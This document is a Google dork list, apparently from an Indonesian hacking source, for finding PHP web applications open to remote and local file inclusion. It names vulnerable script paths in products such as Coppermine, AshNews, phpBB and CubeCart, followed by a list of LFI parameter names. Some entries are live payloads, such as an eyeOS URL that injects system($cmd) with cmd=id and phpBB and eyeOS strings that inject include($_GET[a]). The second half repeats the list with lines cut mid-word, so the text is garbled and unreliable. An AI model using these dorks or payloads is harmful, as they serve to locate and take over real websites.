BUG RFI
========================== =========================
inurl:/modules/mod_mainmen u.php?mosConfig_absolute_p ath=
inurl:/include/new-visitor .inc.php?lvc_include_dir=
inurl:/_functions.php?pref ix=
inurl:/cpcommerce/_functio ns.php?prefix=
inurl:/modules/coppermine/ themes/default/theme.php?T HEME_DIR=
inurl:/modules/agendax/add event.inc.php?agendax_path =
inurl:/ashnews.php?pathtoa shnews=
inurl:/eblog/blog.inc.php? xoopsConfig[xoops_url]=
inurl:/pm/lib.inc.php?pm_p ath=
inurl:/b2-tools/gm-2-b2.ph p?b2inc=
inurl:/modules/mod_mainmen u.php?mosConfig_absolute_p ath=
inurl:/modules/agendax/add event.inc.php?agendax_path =
inurl:/includes/include_on ce.php?include_file=
inurl:/e107/e107_handlers/ secure_img_render.php?p=
inurl:/shoutbox/expanded.p hp?conf=
inurl:/main.php?x=
inurl:/myPHPCalendar/admin .php?cal_dir=
inurl:/index.php/main.php? x=
inurl:/index.php?include=
inurl:/index.php?x=
inurl:/index.php?open=
inurl:/index.php?visualiza r=
inurl:/template.php?pagina =
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/includes/include_on de.php?include_file=
inurl:/index.php?page=
inurl:/index.php?pg=
inurl:/index.php?show=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_local=
inurl:/index.php?site=
inurl:/htmltonuke.php?filn avn=
inurl:/livehelp/inc/pipe.p hp?HCL_path=
inurl:/hcl/inc/pipe.php?HC L_path=
inurl:/inc/pipe.php?HCL_pa th=
inurl:/support/faq/inc/pip e.php?HCL_path=
inurl:/help/faq/inc/pipe.p hp?HCL_path=
inurl:/helpcenter/inc/pipe .php?HCL_path=
inurl:/live-support/inc/pi pe.php?HCL_path=
inurl:/gnu/index.php?doc=
inurl:/phpgwapi/setup/tabl es_update.inc.php?appdir=
inurl:/forum/install.php?p hpbb_root_dir=
inurl:/includes/calendar.p hp?phpc_root_path=
inurl:/includes/setup.php? phpc_root_path=
inurl:/inc/authform.inc.ph p?path_pre=
inurl:/include/authform.in c.php?path_pre=
inurl:index.php?nic=
inurl:index.php?sec=
inurl:index.php?content=
inurl:index.php?link=
inurl:index.php?filename=
inurl:index.php?dir=
inurl:index.php?document=
inurl:index.php?view=
inurl:*.php?sel=
inurl:*.php?session=&conte nt=
inurl:*.php?locate=
inurl:*.php?place=
inurl:*.php?layout=
inurl:*.php?go=
inurl:*.php?catch=
inurl:*.php?mode=
inurl:*.php?name=
inurl:*.php?loc=
inurl:*.php?f=
inurl:*.php?inf=
inurl:*.php?pg=
inurl:*.php?load=
inurl:*.php?naam=
allinurl:/index.php?page= site:*.dk
allinurl:/index.php?file= site:*.dk
INURL OR ALLINURL WITH:
/temp_eg/phpgwapi/setup/ta bles_update.inc.php?appdir =
/includes/header.php?syste mpath=
/Gallery/displayCategory.p hp?basepath=
/index.inc.php?PATH_Includ es=
/ashnews.php?pathtoashnews =
/ashheadlines.php?pathtoas hnews=
/modules/xgallery/upgrade_ album.php?GALLERY_BASEDIR=
/demo/includes/init.php?us er_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepat h=
/poll/admin/common.inc.php ?base_path=
/pollvote/pollvote.php?pol lname=
/sources/post.php?fil_conf ig=
/modules/My_eGallery/publi c/displayCategory.php?base path=
/bb_lib/checkdb.inc.php?li bpach=
/include/livre_include.php ?no_connect=lol&chem_absol u=
/index.php?from_market=Y&p ageurl=
/modules/mod_mainmenu.php? mosConfig_absolute_path=
/pivot/modules/module_db.p hp?pivot_path=
/modules/4nAlbum/public/di splayCategory.php?basepath =
/derniers_commentaires.php ?rep=
/modules/coppermine/themes /default/theme.php?THEME_D IR=
/modules/coppermine/includ e/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes /coppercop/theme.php?THEME _DIR=
/coppermine/themes/maze/th eme.php?THEME_DIR=
/allmylinks/include/footer .inc.php?_AMLconfig[cfg_se rverpath]=
/allmylinks/include/info.i nc.php?_AMVconfig[cfg_serv erpath]=
/myPHPCalendar/admin.php?c al_dir=
/agendax/addevent.inc.php? agendax_path=
/modules/mod_mainmenu.php? mosConfig_absolute_path=
/modules/xoopsgallery/upgr ade_album.php?GALLERY_BASE DIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.p hp?lvc_include_dir=
/modules/agendax/addevent. inc.php?agendax_path=
/shoutbox/expanded.php?con f=
/modules/xgallery/upgrade_ album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.p hp?pivot_path=
/library/editor/editor.php ?root=
/library/lib.php?root=
/e107/e107_handlers/secure _img_render.php?p=
/zentrack/index.php?config File=
/main.php?x=
/becommunity/community/ind ex.php?pageurl=
/GradeMap/index.php?page=
/index4.php?body=
/side/index.php?side=
/main.php?page=
/es/index.php?action=
/index.php?sec=
/index.php?main=
/index.php?sec=
/index.php?menu=
/html/page.php?page=
/page.php?view=
/index.php?menu=
/main.php?view=
/index.php?page=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/index.php?show=
/tutorials/print.php?page=
/index.php?page=
/index.php?level=
/index.php?file=
/index.php?inter_url=
/index.php?page=
/index2.php?menu=
/index.php?level=
/index1.php?main=
/index1.php?nav=
/index1.php?link=
/index2.php?page=
/index.php?myContent=
/index.php?TWC=
/index.php?sec=
/index1.php?main=
/index2.php?page=
/index.php?babInstallPath=
/main.php?body=
/index.php?z=
/main.php?view=
/modules/PNphpBB2/includes /functions_admin.php?phpbb _root_path=
/index.php?file=
/modules/AllMyGuests/signi n.php?_AMGconfig[cfg_serve rpath]=
1. allinurl:my_egallery site:.org
/modules/My_eGallery/publi c/displayCategory.php?base path=
2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_ album.php?GALLERY_BASEDIR=
3. allinurl:coppermine site:.org
/modules/coppermine/themes /default/theme.php?THEME_D IR=
4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/di splayCategory.php?basepath =
5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes /functions_admin.php?phpbb _root_path=
6. allinurl:ihm.php?p=
7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_A MLconfig[cfg_serverpath]=
8. allinurl:/modules.php?name =allmyguests
/modules/AllMyGuests/signi n.php?_AMGconfig[cfg_serve rpath]=
9. allinurl:/Popper/index.php ?
/Popper/index.php?childwin dow.inc.php?form=
10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url _hit]=
11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.incl ude($_GET[a]),exit.%2527&a =
12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc .php?glob=1&cart_order_id= 1&glob[rootDir]=
13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_b t_dir=
14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews =
15. keyword : /phorum/login.php
/phorum/plugin/replace/plu gin.php?PHORUM[settings_di r]=
16. allinurl:ihm.php?p=*
14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio= eyeOptions.eyeapp&a=eyeOpt ions. eyeapp&_SESSION%5busr%5d=r oot&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwr apup%5d=system($cmd);&cm d=id
diganti dengan :
/eyeos/desktop.php?baccio= eyeOptions.eyeapp&a=eyeOpt ions. eyeapp&_SESSION%5busr%5d=r oot&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwr apup%5d=include($_GET%5b a%5d);&a=
15. allinurl:.php?bodyfile=
16. allinurl:/includes/orderSu ccess.inc.php?glob=
/includes/orderSuccess.inc .php?glob=1&cart_order_id= 1&glob[rootDir]=
17. allinurl:forums.html
/modules.php?name=
18. allinurl:/default.php?page =home
19. allinurl:/folder.php?id=
20. allinurl:main.php?pagina=
/paginedinamiche/main.php? pagina=
21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.p hp?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signi n.php?_AMGconfig[cfg_serve rpath]=
22. allinurl:application.php?b ase_path=
/application.php?base_path =
23. allinurlp:hplivehelper
/phplivehelper/initiate.ph p?abs_path=
24. allinurlp:hpnuke
/modules/AllMyGuests/signi n.php?_AMGconfig[cfg_serve rpath]=
25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script _path]=
26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=
27. allinurl:/forum/
/forum/admin/index.php?inc _conf=
28. keyword:"Powered By FusionPHP"
/templates/headline_temp.p hp?nst_inc=
29. allinurl:shoutbox/expanded .php filetypep:hp
/shoutbox/expanded.php?con f=
30. allinurl: /osticket/
/osticket/include/main.php ?config[search_disp]=true& include_dir=
31. keyword : "Powered by iUser"
/common.php?include_path=
32. allinurl: "static.php?load="
/static.php?load=
33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[ _PKG_PATH_DBSE]=
34. keyworld: allinurl:/phpGedview/login .php site:
/help_text_vars.php?dir&PG V_BASE_DIRECTORY=
35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=
========================== =================
DORK LFI
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=
acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
==========================
inurl:/modules/mod_mainmen
inurl:/include/new-visitor
inurl:/_functions.php?pref
inurl:/cpcommerce/_functio
inurl:/modules/coppermine/
inurl:/modules/agendax/add
inurl:/ashnews.php?pathtoa
inurl:/eblog/blog.inc.php?
inurl:/pm/lib.inc.php?pm_p
inurl:/b2-tools/gm-2-b2.ph
inurl:/modules/mod_mainmen
inurl:/modules/agendax/add
inurl:/includes/include_on
inurl:/e107/e107_handlers/
inurl:/shoutbox/expanded.p
inurl:/main.php?x=
inurl:/myPHPCalendar/admin
inurl:/index.php/main.php?
inurl:/index.php?include=
inurl:/index.php?x=
inurl:/index.php?open=
inurl:/index.php?visualiza
inurl:/template.php?pagina
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/includes/include_on
inurl:/index.php?page=
inurl:/index.php?pg=
inurl:/index.php?show=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_local=
inurl:/index.php?site=
inurl:/htmltonuke.php?filn
inurl:/livehelp/inc/pipe.p
inurl:/hcl/inc/pipe.php?HC
inurl:/inc/pipe.php?HCL_pa
inurl:/support/faq/inc/pip
inurl:/help/faq/inc/pipe.p
inurl:/helpcenter/inc/pipe
inurl:/live-support/inc/pi
inurl:/gnu/index.php?doc=
inurl:/phpgwapi/setup/tabl
inurl:/forum/install.php?p
inurl:/includes/calendar.p
inurl:/includes/setup.php?
inurl:/inc/authform.inc.ph
inurl:/include/authform.in
inurl:index.php?nic=
inurl:index.php?sec=
inurl:index.php?content=
inurl:index.php?link=
inurl:index.php?filename=
inurl:index.php?dir=
inurl:index.php?document=
inurl:index.php?view=
inurl:*.php?sel=
inurl:*.php?session=&conte
inurl:*.php?locate=
inurl:*.php?place=
inurl:*.php?layout=
inurl:*.php?go=
inurl:*.php?catch=
inurl:*.php?mode=
inurl:*.php?name=
inurl:*.php?loc=
inurl:*.php?f=
inurl:*.php?inf=
inurl:*.php?pg=
inurl:*.php?load=
inurl:*.php?naam=
allinurl:/index.php?page= site:*.dk
allinurl:/index.php?file= site:*.dk
INURL OR ALLINURL WITH:
/temp_eg/phpgwapi/setup/ta
/includes/header.php?syste
/Gallery/displayCategory.p
/index.inc.php?PATH_Includ
/ashnews.php?pathtoashnews
/ashheadlines.php?pathtoas
/modules/xgallery/upgrade_
/demo/includes/init.php?us
/jaf/index.php?show=
/inc/shows.inc.php?cutepat
/poll/admin/common.inc.php
/pollvote/pollvote.php?pol
/sources/post.php?fil_conf
/modules/My_eGallery/publi
/bb_lib/checkdb.inc.php?li
/include/livre_include.php
/index.php?from_market=Y&p
/modules/mod_mainmenu.php?
/pivot/modules/module_db.p
/modules/4nAlbum/public/di
/derniers_commentaires.php
/modules/coppermine/themes
/modules/coppermine/includ
/modules/coppermine/themes
/coppermine/themes/maze/th
/allmylinks/include/footer
/allmylinks/include/info.i
/myPHPCalendar/admin.php?c
/agendax/addevent.inc.php?
/modules/mod_mainmenu.php?
/modules/xoopsgallery/upgr
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.p
/modules/agendax/addevent.
/shoutbox/expanded.php?con
/modules/xgallery/upgrade_
/pivot/modules/module_db.p
/library/editor/editor.php
/library/lib.php?root=
/e107/e107_handlers/secure
/zentrack/index.php?config
/main.php?x=
/becommunity/community/ind
/GradeMap/index.php?page=
/index4.php?body=
/side/index.php?side=
/main.php?page=
/es/index.php?action=
/index.php?sec=
/index.php?main=
/index.php?sec=
/index.php?menu=
/html/page.php?page=
/page.php?view=
/index.php?menu=
/main.php?view=
/index.php?page=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/index.php?show=
/tutorials/print.php?page=
/index.php?page=
/index.php?level=
/index.php?file=
/index.php?inter_url=
/index.php?page=
/index2.php?menu=
/index.php?level=
/index1.php?main=
/index1.php?nav=
/index1.php?link=
/index2.php?page=
/index.php?myContent=
/index.php?TWC=
/index.php?sec=
/index1.php?main=
/index2.php?page=
/index.php?babInstallPath=
/main.php?body=
/index.php?z=
/main.php?view=
/modules/PNphpBB2/includes
/index.php?file=
/modules/AllMyGuests/signi
1. allinurl:my_egallery site:.org
/modules/My_eGallery/publi
2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_
3. allinurl:coppermine site:.org
/modules/coppermine/themes
4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/di
5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes
6. allinurl:ihm.php?p=
7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_A
8. allinurl:/modules.php?name
/modules/AllMyGuests/signi
9. allinurl:/Popper/index.php
/Popper/index.php?childwin
10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url
11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.incl
12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc
13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_b
14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews
15. keyword : /phorum/login.php
/phorum/plugin/replace/plu
16. allinurl:ihm.php?p=*
14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=
diganti dengan :
/eyeos/desktop.php?baccio=
15. allinurl:.php?bodyfile=
16. allinurl:/includes/orderSu
/includes/orderSuccess.inc
17. allinurl:forums.html
/modules.php?name=
18. allinurl:/default.php?page
19. allinurl:/folder.php?id=
20. allinurl:main.php?pagina=
/paginedinamiche/main.php?
21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.p
/modules/AllMyGuests/signi
22. allinurl:application.php?b
/application.php?base_path
23. allinurlp:hplivehelper
/phplivehelper/initiate.ph
24. allinurlp:hpnuke
/modules/AllMyGuests/signi
25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script
26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=
27. allinurl:/forum/
/forum/admin/index.php?inc
28. keyword:"Powered By FusionPHP"
/templates/headline_temp.p
29. allinurl:shoutbox/expanded
/shoutbox/expanded.php?con
30. allinurl: /osticket/
/osticket/include/main.php
31. keyword : "Powered by iUser"
/common.php?include_path=
32. allinurl: "static.php?load="
/static.php?load=
33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[
34. keyworld: allinurl:/phpGedview/login
/help_text_vars.php?dir&PG
35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=
==========================
DORK LFI
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=
acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=